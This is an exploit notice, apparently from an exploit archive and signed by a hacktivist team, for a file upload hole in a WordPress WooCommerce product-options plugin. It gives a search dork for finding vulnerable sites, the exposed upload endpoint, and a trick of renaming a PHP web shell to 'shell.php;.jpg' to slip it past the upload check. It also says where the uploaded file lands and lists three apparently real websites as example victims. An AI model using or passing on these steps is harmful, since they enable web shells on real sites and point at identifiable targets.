Wordpress Product Options for WooCommerce Plugin File Upload
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wordpress Product Options for WooCommerce Plugin File Upload</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|[+] Exploit Title: Wordpress Product Options for WooCommerce Plugin File Upload |[+] |[+] Exploit Author: M4ni4c |[+] |[+] Team Name: Azerbaijan Cyber Army |[+] |[+] Official Website: http://az-cyber.org/ |[+] |[+] Software Link: http://codecanyon.net/item/product-options-for-woocommerce-wp-plugin/7973927 |[+] |[+] Google Dork: inurl:/woocommerce-product-options/includes/ |[+] |[+] Date: 11.04.2016 |[+] |--------------------------------------------------------------| |[+] Exploit: VICTIM/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] Description: Change your shell's extension "shell.php" to "shell.php;.jpg" and upload your shell |[+] |[+] Your files uploaded to VICTIM/wp-content/uploads/filename |[+] |[+] OR |[+] |[+] VICTIM/wp-content/[year]/[month]/filename |[+] |[+] Examples: |[+] |[+] http://www.detasselingppe.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://medindex.am/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://www.bo3generacion.es/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] Qarabag Bizimdir, Bizim Olacaq |[+] |[+] Thanks: KroNiqs, Niko, Riko, Dado, Sprited |[+] And Thanks My Friends: F3D4I & AlpArslan Beyy |[+] Special Thanks: CXSECURITY.COM Team's Members </BODY></HTML>
